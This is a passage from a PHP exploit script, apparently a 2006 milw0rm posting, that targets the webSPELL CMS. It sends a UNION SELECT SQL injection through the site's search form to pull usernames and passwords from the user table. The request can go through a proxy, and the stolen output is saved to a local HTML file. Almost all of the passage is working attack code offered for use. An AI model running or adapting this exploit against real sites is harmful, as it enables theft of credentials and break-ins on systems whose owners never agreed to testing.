x128.net oo website : www.x128.net"; } function xss_exploit() { $xss_target = $_SERVER['argv'][1] . "/index.php"; $xss_http_get = "?site=search&action=search"; $xss_http_post = "table=news&title1=9a39b0c5e6849658e30d1432a308103d&title_op=UNION SELECT 1, 1, 1, 1, username, `password`, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM ". $_SERVER['argv'][2] ."user/*"; $xss_connection = curl_init(); if ($_SERVER['argv'][3]) { curl_setopt($xss_connection, CURLOPT_TIMEOUT, 8); curl_setopt($xss_connection, CURLOPT_PROXY, $_SERVER['argv'][3]); } curl_setopt ($xss_connection, CURLOPT_URL, $xss_target . $xss_http_get); curl_setopt ($xss_connection, CURLOPT_HEADER, 0); curl_setopt ($xss_connection, CURLOPT_POST, 1); curl_setopt ($xss_connection, CURLOPT_POSTFIELDS, $xss_http_post); curl_setopt ($xss_connection, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($xss_connection, CURLOPT_USERAGENT, 'x128'); $xss_source = curl_exec($xss_connection) or die("oo error - cannot connect!"); if ($xss_source) echo "oo dafaced ...\n"; $xss_output = fopen("webspell_pw.html","w"); fputs($xss_output, $xss_source); fclose($xss_output); curl_close ($xss_connection); } xss_init(); xss_header(); xss_exploit(); xss_bottom(); ?> # milw0rm.com [2006-02-14]